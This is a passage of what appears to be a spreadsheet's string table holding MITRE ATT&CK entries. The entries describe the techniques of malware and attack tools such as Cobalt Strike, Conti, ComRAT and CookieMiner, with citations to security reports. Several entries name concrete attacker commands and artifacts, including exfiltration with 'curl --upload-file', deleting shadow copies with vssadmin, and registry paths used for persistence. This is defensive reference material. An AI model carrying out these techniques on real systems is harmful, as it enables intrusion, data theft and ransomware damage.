    <t>Password Guessing</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can perform brute force password guessing against authentication portals.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s client component is packed with UPX.(Citation: Lee 2013)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component can change the timestamp of files.(Citation: FireEye Periscope March 2018)(Citation: Lee 2013)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component executes code sent via HTTP POST commands.(Citation: FireEye Periscope March 2018)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component is a Web Shell payload.(Citation: Lee 2013)</t>
  </si>
  <si>
    <t>[China Chopper](https://attack.mitre.org/software/S0020)'s server component is capable of opening a command terminal.(Citation: SecureWorks BRONZE UNION June 2017)(Citation: Lee 2013)(Citation: NCSC Joint Report Public Tools)</t>
  </si>
  <si>
    <t>One variant of [CloudDuke](https://attack.mitre.org/software/S0054) uses a Microsoft OneDrive account to exchange commands and stolen data with its operators.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[CloudDuke](https://attack.mitre.org/software/S0054) downloads and executes additional malware from either a Web address or a Microsoft OneDrive account.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>One variant of [CloudDuke](https://attack.mitre.org/software/S0054) uses HTTP and HTTPS for C2.(Citation: F-Secure The Dukes)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can conduct peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use RSA asymmetric encryption with PKCS1 padding to encrypt data sent to the C2 server.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can download a hosted "beacon" payload using [BITSAdmin](https://attack.mitre.org/software/S0190).(Citation: CobaltStrike Scripted Web Delivery)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use a number of known techniques to bypass Windows UAC.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use self signed Java applets to execute signed applet attacks.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use a custom command and control protocol that can encapsulated in DNS. All protocols use their standard assigned ports.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can collect data from a local system.(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can deobfuscate shellcode using a rolling XOR.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to use Smart Applet attacks to disable the Java SecurityManager sandbox.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>Distributed Component Object Model</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can deliver "beacon" payloads for lateral movement by leveraging remote COM execution.(Citation: Cobalt Strike DCOM Jan 2017)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can determine if the user on an infected machine is in the admin or domain admin group.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>Domain Accounts</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use known credentials to run commands and spawn processes as a domain user account.(Citation: cobaltstrike manual)(Citation: CobaltStrike Daddy May 2017)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to load DLLs via reflective injection.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can exploit Oracle Java vulnerabilities for execution, including CVE-2011-3544, CVE-2013-2465, CVE-2012-4681, and CVE-2013-2460.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can exploit vulnerabilities such as MS14-058.(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>Indicator Removal from Tools</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) includes a capability to modify the "beacon" payload to eliminate known signatures or unpacking methods.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can deliver additional payloads to victim machines.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can be configured to have commands relayed over a peer-to-peer network of infected hosts. This can be used to limit the number of egress points, or provide access to a host without direct internet access.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>The [Cobalt Strike](https://attack.mitre.org/software/S0154) System Profiler can use JavaScript to perform reconnaissance actions.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can track key presses with a keylogger module.(Citation: cobaltstrike manual)(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>Local Accounts</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use known credentials to run commands and spawn processes as a local user account.(Citation: cobaltstrike manual)(Citation: CobaltStrike Daddy May 2017)</t>
  </si>
  <si>
    <t>Make and Impersonate Token</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can make tokens from known credentials.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can perform browser pivoting and inject into a user's browser to inherit cookies, authenticated HTTP sessions, and client SSL certificates.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can modify Registry values within &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office\&lt;Excel Version&gt;\Excel\Security\AccessVBOM\&lt;/code&gt; to enable the execution of additional code.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154)'s "beacon" payload is capable of running shell commands without &lt;code&gt;cmd.exe&lt;/code&gt; and PowerShell commands without &lt;code&gt;powershell.exe&lt;/code&gt;(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can perform port scans from an infected host.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can query shared drives on the local system.(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can be configured to use TCP for C2 communications.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can hash functions to obfuscate calls to the Windows API.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to use an Excel Workbook to execute additional code by enabling Office to trust macros and execute code without user permission.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>Parent PID Spoofing</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can spawn processes with alternate PPIDs.(Citation: CobaltStrike Daddy May 2017)</t>
  </si>
  <si>
    <t>Pass the Hash</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can perform pass the hash.(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can execute a payload on a remote host with PowerShell. This technique does not write any data to disk.(Citation: cobaltstrike manual)(Citation: Cyberreason Anchor December 2019) [Cobalt Strike](https://attack.mitre.org/software/S0154) can also use [PowerSploit](https://attack.mitre.org/software/S0194) and other scripting frameworks to perform execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: CobaltStrike Daddy May 2017)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154)'s "beacon" payload can collect information on process details.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use process hollowing for execution.(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can inject a variety of payloads into processes dynamically chosen by the adversary.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) uses a custom command and control protocol that is encapsulated in HTTP, HTTPS, or DNS. In addition, it conducts peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use Python to perform execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: CobaltStrike Daddy May 2017)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can query &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Office\&lt;Excel Version&gt;\Excel\Security\AccessVBOM\&lt;/code&gt;  to determine if the security setting for restricting default programmatic access is enabled.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can start a VNC-based remote desktop server and tunnel the connection through the already established C2 channel.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) uses the native Windows Network Enumeration APIs to interrogate and discover targets in a Windows Active Directory network.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use Window admin shares (C$ and ADMIN$) for lateral movement.(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>SSH</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can SSH to a remote service.(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can set its "beacon" payload to reach out to the C2 server on an arbitrary and random interval. In addition it will break large data sets into smaller chunks for exfiltration.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154)'s "beacon" payload is capable of capturing screenshots.(Citation: cobaltstrike manual)(Citation: Amnesty Intl. Ocean Lotus February 2021)</t>
  </si>
  <si>
    <t>Security Account Manager</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can recover hashed passwords.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use [PsExec](https://attack.mitre.org/software/S0029) to execute a payload on a remote host. It can also use Service Control Manager to start new services.(Citation: cobaltstrike manual)(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) has the ability to use AES-256 symmetric encryption in CBC mode with HMAC-SHA-256 to encrypt task commands and XOR to encrypt shell code and configuration data.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can determine the IP addresses of domain controllers.(Citation: Cyberreason Anchor December 2019)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can produce a sessions report from compromised hosts.(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can timestomp any files or payloads placed on a target machine to help them blend in.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can steal access tokens from exiting processes.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use VBA to perform execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: CobaltStrike Daddy May 2017)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use a custom command and control protocol that can be encapsulated in HTTP or HTTPS. All protocols use their standard assigned ports.(Citation: cobaltstrike manual)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) uses a command-line interface to interact with systems.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: Talos Cobalt Strike September 2020)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use WMI to deliver a payload to a remote host.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>Windows Remote Management</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can use &lt;code&gt;WinRM&lt;/code&gt; to execute a payload on a remote host.(Citation: cobaltstrike manual)</t>
  </si>
  <si>
    <t>[Cobalt Strike](https://attack.mitre.org/software/S0154) can install a new service.(Citation: Cobalt Strike TTPs Dec 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) has a feature to perform voice recording on the victim’s machine.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) uses DNS for C2.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) has a feature to perform keylogging on the victim’s machine.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) creates an autostart Registry key to ensure persistence.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) has a feature to perform screen capture.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) obfuscates communications with the C2 server using Base64 encoding.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) has a feature to access the webcam on the victim’s machine.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[Cobian RAT](https://attack.mitre.org/software/S0338) can launch a remote command shell interface for executing commands.(Citation: Zscaler Cobian Aug 2017)</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) decodes the initially-downloaded hidden encoded file using OpenSSL.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>Gatekeeper Bypass</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) downloads the EggShell mach-o binary using curl, which does not set the quarantine flag.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) downloads the following hidden files to evade detection and maintain persistence: /private/tmp/.info.enc, /private/tmp/.info.py, /private/tmp/.server.sh, ~/Library/LaunchAgents/.espl.plist, ~/Library/Containers/.[random string]/[random string].(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) executes a Python script to download its second stage.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) creates user launch agents named .espl.plist and com.apple.[random string].plist to establish persistence.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) initially downloads a hidden encoded file.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t>[CoinTicker](https://attack.mitre.org/software/S0369) executes a bash script to establish a reverse shell.(Citation: CoinTicker 2019)</t>
  </si>
  <si>
    <t xml:space="preserve">[ComRAT](https://attack.mitre.org/software/S0126) can use SSL/TLS encryption for its HTTP-based C2 channel. [ComRAT](https://attack.mitre.org/software/S0126) has used public key cryptography with RSA and AES encrypted email attachments for its Gmail C2 channel.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020) </t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has the ability to use the Gmail web UI to receive commands and exfiltrate information.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) samples have been seen which hijack COM objects for persistence by replacing the path to shell32.dll in registry location &lt;code&gt;HKCU\Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32&lt;/code&gt;.(Citation: NorthSec 2015 GData Uroburos Tools)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used unique per machine passwords to decrypt the orchestrator payload and a hardcoded XOR key to decrypt its communications module. [ComRAT](https://attack.mitre.org/software/S0126) has also used a unique password to decrypt the file used for its hidden file system.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has injected its orchestrator DLL into explorer.exe. [ComRAT](https://attack.mitre.org/software/S0126) has also injected its communications module into the victim's default browser to make C2 connections appear less suspicious as all network connections will be initiated by the browser process.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used a portable FAT16 partition image placed in %TEMP% as a hidden file system.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) can use email attachments for command and control.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used a task name associated with Windows SQM Consolidator.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[ComRAT](https://attack.mitre.org/software/S0126) has encrypted and stored its orchestrator code in the Registry as well as a PowerShell script into the WsqmCons Registry key.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020) </t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) can load a PE file from memory or the file system and execute it with &lt;code&gt;CreateProcessW&lt;/code&gt;.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[ComRAT](https://attack.mitre.org/software/S0126) has used encryption and base64 to obfuscate its orchestrator code in the Registry. [ComRAT](https://attack.mitre.org/software/S0126) has also embedded an XOR encrypted communications module inside the orchestrator module. [ComRAT](https://attack.mitre.org/software/S0126) has encrypted its virtual file system using AES-256 in XTS mode and has encoded PowerShell scripts.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020) </t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used PowerShell to load itself every time a user logs in to the system. [ComRAT](https://attack.mitre.org/software/S0126) can execute PowerShell scripts loaded into memory or from the file system.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) can check the default browser by querying &lt;code&gt;HKCR\http\shell\open\command&lt;/code&gt;.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used a scheduled task to launch its PowerShell loader.(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has been programmed to sleep outside local business hours (9 to 5, Monday to Friday).(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) can check the victim's default browser to determine which process to inject its communications module into.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[ComRAT](https://attack.mitre.org/software/S0126) has checked the victim system's date and time to perform tasks during business hours (9 to 5, Monday to Friday).(Citation: CISA ComRAT Oct 2020) </t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used HTTP requests for command and control.(Citation: NorthSec 2015 GData Uroburos Tools)(Citation: ESET ComRAT May 2020)(Citation: CISA ComRAT Oct 2020)</t>
  </si>
  <si>
    <t>[ComRAT](https://attack.mitre.org/software/S0126) has used &lt;code&gt;cmd.exe&lt;/code&gt; to execute commands.(Citation: ESET ComRAT May 2020)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) executes a batch script to store discovery information in %TEMP%\info.dat and then uploads the temporarily file to the remote C2 server.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses blogs and third-party sites (GitHub, tumbler, and BlogSpot) to avoid DNS-based blocking of their communication to the command and control server.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) appends a total of 64MB of garbage data to a file to deter any security products in place that may be scanning files on disk.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses the &lt;code&gt;net user&lt;/code&gt; command.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses RC4 and Base64 to obfuscate strings.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses the &lt;code&gt;tasklist&lt;/code&gt; to view running processes on the victim’s machine.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) achieves persistence by adding a shortcut of itself to the startup path in the Registry.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) runs the &lt;code&gt;net view&lt;/code&gt; command</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses Rundll32 to load a malicious DLL.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) attempts to detect several anti-virus products.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) establishes persistence via a .lnk file in the victim’s startup path.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) encrypts command and control communications with RC4.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) collects the hostname of the victim machine.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses &lt;code&gt;ipconfig /all&lt;/code&gt; and &lt;code&gt;route PRINT&lt;/code&gt; to identify network adapter and interface information.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) executes the &lt;code&gt;netstat -ano&lt;/code&gt; command.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) runs the command: &lt;code&gt;net start &gt;&gt; %TEMP%\info.dat&lt;/code&gt; on a victim.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) executes VBS scripts.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) uses HTTP for C2 communication.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[Comnie](https://attack.mitre.org/software/S0244) executes BAT scripts.(Citation: Palo Alto Comnie)</t>
  </si>
  <si>
    <t>[ConnectWise](https://attack.mitre.org/software/S0591) can be used to execute PowerShell commands on target machines.(Citation: Anomali Static Kitten February 2021)</t>
  </si>
  <si>
    <t>[ConnectWise](https://attack.mitre.org/software/S0591) can take screenshots on remote hosts.(Citation: Anomali Static Kitten February 2021)</t>
  </si>
  <si>
    <t>[ConnectWise](https://attack.mitre.org/software/S0591) can record video on remote hosts.(Citation: Anomali Static Kitten February 2021)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can use &lt;code&gt;CreateIoCompletionPort()&lt;/code&gt;, &lt;code&gt;PostQueuedCompletionStatus()&lt;/code&gt;, and &lt;code&gt;GetQueuedCompletionPort()&lt;/code&gt; to rapidly encrypt files, excluding those with the extensions of .exe, .dll, and .lnk. It has used a different AES-256 encryption key per file with a bundled RAS-4096 public encryption key that is unique for each victim. [Conti](https://attack.mitre.org/software/S0575) can use “Windows Restart Manager” to ensure files are unlocked and open for encryption.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)(Citation: Cybleinc Conti January 2020)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) has decrypted its payload using a hardcoded AES-256 key.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) has loaded an encrypted DLL into memory and then executes it.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can discover files on a local system.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can delete Windows Volume Shadow Copies using &lt;code&gt;vssadmin&lt;/code&gt;.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Conti](https://attack.mitre.org/software/S0575) has used API calls during execution.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020) </t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can enumerate remote open SMB network shares using &lt;code&gt;NetShareEnum()&lt;/code&gt;.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) has encrypted DLLs and used obfuscation to hide Windows API calls.(Citation: CarbonBlack Conti July 2020)(Citation: Cybereason Conti Jan 2021)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can enumerate through all open processes to search for any that have the string “sql” in their process name.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can spread via SMB and encrypts files on different hosts, potentially compromising an entire network.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can stop up to 146 Windows services related to security, backup, database, and email solutions through the use of &lt;code&gt;net stop&lt;/code&gt;.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Conti](https://attack.mitre.org/software/S0575) can retrieve the ARP cache from the local system by using the &lt;code&gt;GetIpNetTable()&lt;/code&gt; API call and check to ensure IP addresses it connects to are for local, non-Internet, systems.(Citation: CarbonBlack Conti July 2020) </t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can enumerate routine network connections from a compromised host.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Conti](https://attack.mitre.org/software/S0575) can spread itself by infecting other remote machines via network shared drives.(Citation: Cybereason Conti Jan 2021)(Citation: CarbonBlack Conti July 2020) </t>
  </si>
  <si>
    <t>[Conti](https://attack.mitre.org/software/S0575) can utilize command line options to allow an attacker control over how it scans and encrypts files.(Citation: CarbonBlack Conti July 2020)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) can steal saved usernames and passwords in Chrome as well as credit card credentials.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has retrieved iPhone text messages from iTunes phone backup files.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has used Google Chrome's decryption and extraction operations.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has checked for the presence of "Little Snitch", macOS network monitoring and application firewall software, stopping and exiting if it is found.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has used the &lt;code&gt;curl --upload-file&lt;/code&gt; command to exfiltrate data over HTTP.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) has looked for files in the user's home directory with "wallet" in their name using &lt;code&gt;find&lt;/code&gt;.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
    <t>[CookieMiner](https://attack.mitre.org/software/S0492) can download additional scripts from a web server.(Citation: Unit42 CookieMiner Jan 2019)</t>
  </si>
  <si>
